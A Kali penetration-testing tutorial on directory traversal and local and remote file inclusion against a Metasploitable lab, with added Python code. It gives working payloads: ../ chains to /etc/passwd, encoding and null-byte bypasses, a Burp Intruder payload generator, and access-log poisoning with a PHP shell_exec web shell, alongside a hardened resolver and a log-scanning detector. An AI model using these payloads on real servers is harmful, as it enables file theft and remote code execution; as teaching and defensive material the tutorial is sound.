Little White Diary 37: Kali Penetration Testing - Web Penetration - Manual Vulnerability Mining (III) - Directory Traversal, File Inclusion

Source: Internet
Author: User
Tags php language

Manual vulnerability Mining

Vulnerability type

#Directory Traversal "read files on the server's operating system"

Through the browser URL or a parameter value, a user can read operating system files outside the Web root directory (default: /var/www/), for example /etc/passwd. Root cause: access to directories is not strictly restricted

#File Inclusion "1. Local File Inclusion (LFI); 2. Remote File Inclusion (RFI), which can pull a webshell (Trojan) in from an attacker-controlled host"

Typically a function such as include() is allowed to include files outside the Web root directory. Root cause: the include() function does not restrict the input variable

#The exploitation method and the effect achieved are essentially the same for both vulnerability types.
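The root cause stated above, an include() whose input variable is not restricted, is easiest to see in a small model. The following is an added example, not code from the original post: vulnerable_resolve() reproduces what include($_GET['page']) does with the web root as its working directory, so that both ../ traversal and an absolute path escape the root, and hardened_resolve() is the containment plus allow-list check that stops it. No files are opened. /var/www is the Metasploitable default named in the post; the page names and the hardened_resolve() function are assumptions for illustration.

```python
"""Added example, not from the original post: a pure path-logic model of
include($_GET['page']) showing why an unrestricted variable escapes the web
root, beside the containment plus allow-list check that fixes it.
WEBROOT is the Metasploitable default; ALLOWED_PAGES is an assumption."""
import posixpath
from typing import Optional

WEBROOT = "/var/www"
ALLOWED_PAGES = {"home.php", "about.php"}   # assumed allow-list of includable pages


def vulnerable_resolve(page: str) -> str:
    """What include($_GET['page']) does with the web root as working
    directory: a relative value resolves against WEBROOT, an absolute value
    is taken as-is, and every ../ is honoured. Surplus ../ beyond / are
    dropped, which is why 'the more ../ the better' works."""
    return posixpath.normpath(posixpath.join(WEBROOT, page))


def is_contained(path: str, root: str) -> bool:
    """True only if the normalised path is root itself or lies below it.
    commonpath() avoids the prefix bug where /var/wwwevil passes a
    startswith('/var/www') test."""
    return posixpath.commonpath([posixpath.normpath(path), root]) == root


def hardened_resolve(page: str) -> Optional[str]:
    """Reject an embedded NUL (PHP before 5.3.4 truncated the filename
    there), normalise, require the result to stay under WEBROOT, then
    require the page to be one we actually serve. None means refused."""
    if "\x00" in page:
        return None
    candidate = posixpath.normpath(posixpath.join(WEBROOT, page))
    if not is_contained(candidate, WEBROOT):
        return None          # ../ traversal or absolute path escaped the web root
    if posixpath.basename(candidate) not in ALLOWED_PAGES:
        return None          # inside the root, but not a page meant to be included
    return candidate


if __name__ == "__main__":
    for p in ["home.php", "../../../../etc/passwd", "/etc/passwd", "home.php\x00.php"]:
        print(repr(p), "->", vulnerable_resolve(p), "| hardened:", hardened_resolve(p))
```

Containment alone is not enough: /var/www/uploads/shell.txt is inside the root and would still be included, which is why the allow-list is the second check. Real code should also resolve symlinks (realpath) before the containment test; the model above works on the path string only.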

Note: Kali ships some attack vector dictionaries by default, e.g. /usr/share/wfuzz/wordlist/vulns

##################################################################

By default, Metasploitable only has a local file inclusion vulnerability, not a remote file inclusion vulnerability (allow_url_include is Off in its php.ini)

#Modify the Metasploitable configuration file

sudo vi /etc/php5/cgi/php.ini

/allow_url    Search for the allow_url settings and set allow_url_include = On (allow_url_fopen must also be On)

sudo /etc/init.d/apache2 restart    Restart the Apache service

##########################################################################

Exploitation

First observe the features of the request, e.g. parameters such as page=a.php, home=b.html, file=content; then test the form or the URL address

Classic test methods

/etc/passwd: a file readable by any ordinary user, often used for testing

1. file=../../../../etc/passwd

Explanation: both Windows and Linux have two special directory entries

. represents the current directory

../ represents the parent of the current directory (one level up)

"The more ../ the better", because surplus ../ at the root are simply ignored, so a long chain is guaranteed to land in the root directory whatever the starting depth

#An absolute path can also be used directly: ?page=/etc/passwd. That does not exercise the directory traversal vulnerability, though; for traversal you need "../"

2. ?page=file:///etc/passwd "File system access through the file:// scheme; an absolute path such as /etc/passwd is required after it"

3. home=main.cgi "Read source code, configuration information, etc."

4. page=http://www.a.com/1.php (include a file hosted on another web server) "Remote file inclusion"

You can set up a Web server of your own and put a reverse shell on it

?page=http://1.1.1.1/../../../../dir/file.txt

Encoding to bypass character filtering

When the response says it cannot find the file, you can usually conclude that a filtering mechanism is in place

Before PHP 5.3.4 this bypass existed:

"%00" (the null byte, a control character) "In PHP's file handling, everything after %00 is ignored, because the underlying C string ends at the NUL"

For example: ?file=a.doc%00.php, PHP opens a.doc and drops the trailing .php (useful when the application itself appends .php to the parameter)

Try a variety of encodings "every character can be encoded; a filter usually blocks only a few literal characters, so an encoded form of the same character gets past it"

Special characters: "." "/" #Plain letters will certainly not be filtered

######################################################################

#Path characteristics of different operating systems

#Unix-like systems

Root directory: /

Directory separator: /

#Windows systems

Root directory: C:\

Directory separator: \ or /

######################################################################

Encoding

Most commonly used: URL encoding "If one layer of encoding is not enough to bypass, use double or multi-layer URL encoding, on the condition that the server decodes the ciphertext that many times"

Purpose: the target server decodes the encoding normally, so you see what you wanted to see, and the filter is bypassed

%2E%2E%2F decodes to: ../

%2E%2E%5C decodes to: ..\
%252E%252E%255C decodes to: ..\ "Double encoding: the special character % is itself encoded as %25, so two decoding passes are needed"

Unicode/UTF-8 "non-English character encoding"

..%C0%AF decodes to: ../ (overlong UTF-8 encoding of /)
..%u2216 decodes to: ..\ (IIS-style %u encoding)
..%C1%9C decodes to: ..\ (overlong UTF-8 encoding of \)

#Online tools can be used for encoding

######################################################################################

Other characters a system's path handling may accept

?file.txt...
?file.txt<spaces> #trailing spaces
?file.txt"""
?file.txt<<<>>><
?./././file.txt
?nonexistent/../file.txt #a directory that does not exist "many operating systems already reject this"

UNC path "Windows file sharing"

?\\1.1.1.1\path\to\file.txt

Note: the common characters can be encoded in advance and combined pairwise or in any combination into a dictionary file; attacking with it through Intruder in Burp Suite improves efficiency
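The dictionary the note above describes can be generated rather than typed. The following is an added example, not code from the original post: it takes the spellings of "one directory up" from the encoding tables above, applies single and double URL encoding itself, repeats each spelling to the chosen depth, appends the null-byte suffixes, and prints one payload per line for Burp Intruder. server_decode() shows how many decoding passes each form needs. The target file and depth are assumptions.

```python
"""Added example, not from the original post: generates a traversal payload
dictionary for Burp Intruder from the encodings discussed above, and shows
how many URL-decode passes each encoding needs. Target and depth are assumed."""
from urllib.parse import quote, unquote

# Spellings of "one directory up". Overlong UTF-8 (%C0%AF, %C1%9C) and the IIS
# %u form are kept as literal strings: a strict UTF-8 decoder rejects them, and
# only lenient servers ever mapped them to / and \.
STEP_VARIANTS = [
    "../",                 # plain
    "..\\",                # Windows separator
    "%2E%2E%2F",           # single URL encoding of ../
    "%2E%2E%5C",           # single URL encoding of ..\
    "%252E%252E%252F",     # double URL encoding of ../
    "%252E%252E%255C",     # double URL encoding of ..\
    "..%C0%AF",            # overlong UTF-8 for /
    "..%C1%9C",            # overlong UTF-8 for \
    "..%u2216",            # IIS %u encoding
    "....//",              # survives one pass of stripping "../"
    "....\\\\",            # same trick for the backslash
]
# Null-byte truncation (PHP before 5.3.4), plain and double-encoded.
SUFFIXES = ["", "%00", "%00.php", "%2500"]


def url_encode_all(s: str) -> str:
    """Percent-encode every byte; quote() would leave '.', '/' and letters alone."""
    return "".join("%%%02X" % b for b in s.encode("utf-8"))


def double_encode(s: str) -> str:
    """Encode twice: the '%' of the first layer itself becomes %25."""
    return quote(url_encode_all(s), safe="")


def server_decode(s: str, passes: int) -> str:
    """Mimic a server (or proxy + application chain) that URL-decodes `passes` times."""
    for _ in range(passes):
        s = unquote(s)
    return s


def traversal_payloads(target: str, depth: int) -> list:
    """Every step variant repeated `depth` times with every suffix, plus the
    absolute-path and file:// forms. Order is kept, duplicates are dropped."""
    payloads = []
    for step in STEP_VARIANTS:
        for suffix in SUFFIXES:
            payloads.append(step * depth + target + suffix)
    payloads.append("/" + target)          # absolute path, no traversal needed
    payloads.append("file:///" + target)   # file:// wrapper
    return list(dict.fromkeys(payloads))


if __name__ == "__main__":
    # Assumed target and depth; redirect stdout to a file and load it in Intruder.
    for payload in traversal_payloads("etc/passwd", depth=6):
        print(payload)
```

Run it as `python3 gen.py > traversal.txt` and load the file as a simple list payload set; Intruder's own URL-encoding of special characters should be switched off so the pre-encoded forms reach the server unchanged.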

######################################################################################

Exception: nothing visible in the URL; the parameter is carried in the Cookie of the HTTP request header

Code:

Attack: "The injection point is the cookie value"

Results:

Note: every variable must be validated

##########################################################################################

Example Demo

Local File Inclusion (LFI)

View files

Code execution "Special case: code injection through the server's access log"

The payload is sent in a part of the request that Apache logs (the request line or the User-Agent header), so it is written into the log verbatim:

<?php echo shell_exec($_GET['cmd']); ?>



Apache access.log "Premise: the web server user has read permission on the log file"

Then include the log file through the LFI in the browser and pass the command in the cmd parameter
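Both halves of the log poisoning procedure above, as an added example that is not code from the original post. build_poisoning_request() produces the raw HTTP request whose User-Agent carries the PHP payload so that Apache writes it to access.log, build_lfi_url() builds the follow-up request that includes the log and passes cmd, and find_suspicious() is the defender's view: a scan of access-log lines for PHP tags in logged fields and for traversal sequences in the request line. The host, the log path /var/log/apache2/access.log and the sample log lines are constructed for the example.

```python
"""Added example, not from the original post: attacker-side request
construction for access-log poisoning, and a defender-side scan of the
Apache combined log for the same attack. Host, log path and SAMPLE_LOG are
constructed for illustration."""
import re
from urllib.parse import quote

PHP_PAYLOAD = "<?php echo shell_exec($_GET['cmd']); ?>"   # the payload from the text
LOG_PATH = "/var/log/apache2/access.log"                    # assumed Debian/Ubuntu default


def build_poisoning_request(host: str, payload: str = PHP_PAYLOAD) -> bytes:
    """Raw HTTP/1.1 request. The payload rides in User-Agent, which the
    combined log format records verbatim (Apache only escapes " and \\,
    neither of which the payload contains)."""
    lines = ["GET / HTTP/1.1", f"Host: {host}", f"User-Agent: {payload}",
             "Connection: close", "", ""]
    return "\r\n".join(lines).encode()


def build_lfi_url(host: str, log_path: str = LOG_PATH, cmd: str = "id", depth: int = 6) -> str:
    """Second request: include the poisoned log through the LFI and pass the
    command in cmd. Surplus ../ beyond / are ignored, so depth is generous."""
    traversal = "../" * depth
    return f"http://{host}/index.php?page={traversal}{log_path.lstrip('/')}&cmd={quote(cmd)}"


# Apache combined log format; quoted fields may contain \" and \\ escapes.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\./|%2e%2e%2f|\.\.%2f|%2e%2e/", re.IGNORECASE)


def find_suspicious(lines):
    """Return (line number, field, reason) for logged PHP tags in any quoted
    field and for traversal sequences in the request line."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            if PHP_TAG.search(m[field]):
                findings.append((number, field, "php-tag"))
        if TRAVERSAL.search(m["request"]):
            findings.append((number, "request", "traversal"))
    return findings


# Constructed sample: a normal hit, the poisoning request, then the LFI read of the log.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo shell_exec($_GET['cmd']); ?>"
10.0.0.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?page=../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    print(build_poisoning_request("10.0.0.5").decode())
    print(build_lfi_url("10.0.0.5"))
    for finding in find_suspicious(SAMPLE_LOG):
        print("suspicious:", finding)
```

The detection side is deliberately simple: a PHP open tag has no business in a User-Agent or Referer, and a request line containing ../ followed by a log path is the second half of the same attack, so the two findings together are a high-confidence signal.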

##############################################################################

Note: on Linux, when you grant permissions on a file, make sure the directories above it also carry the permissions needed to reach it (the execute bit on each directory level), otherwise the file remains unreadable

##############################################################################

 

Remote File Inclusion (RFI) "compared with local inclusion, less likely to be present"

Verify:

Harm:

Low level

Medium level

Bypass idea "the filter runs only once"

1. Encoding

2. Mixed characters
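The two bypass ideas above both rely on the filter running a single time. The following is an added example, not code from the original post: strip_once() models a blacklist that removes "../" in one pass, and the mixed-character payload "....//" collapses to "../" after it has run; strip_until_stable() loops the same strip to a fixed point, which closes that hole but still lets absolute paths and URL-encoded forms through, which is why the allow-list is the real fix. The page names in allow_list() are assumptions.

```python
"""Added example, not from the original post: the 'filter only once' bypass
and why looping the filter is still not a fix. The allow-list page names are
assumptions for illustration."""
from typing import Optional


def strip_once(page: str) -> str:
    """Equivalent of str_replace(array('../', '..\\'), '', $page): a single pass."""
    return page.replace("../", "").replace("..\\", "")


def strip_until_stable(page: str) -> str:
    """Repeat the strip until the string stops changing (fixed point)."""
    previous = None
    while previous != page:
        previous, page = page, strip_once(page)
    return page


def allow_list(page: str, allowed=("include.php", "file1.php")) -> Optional[str]:
    """Positive validation: the value must be exactly one of the known pages.
    Encoding and mixed characters are irrelevant because nothing is stripped."""
    return page if page in allowed else None


def bypass_survives(payload: str, filt) -> bool:
    """True if a traversal step is still present after the filter has run."""
    filtered = filt(payload)
    return "../" in filtered or "..\\" in filtered


if __name__ == "__main__":
    for payload in ["../../etc/passwd", "....//....//etc/passwd",
                    "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"]:
        print(f"{payload:28} once -> {strip_once(payload):20} "
              f"stable -> {strip_until_stable(payload)}")
```

Note what the looped version does not catch: "%2e%2e/" is left intact and is decoded to "../" by the server afterwards, and "/etc/passwd" never contained a step to strip in the first place. Blacklisting characters is a losing game; only positive validation of the whole value holds.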

High level restriction
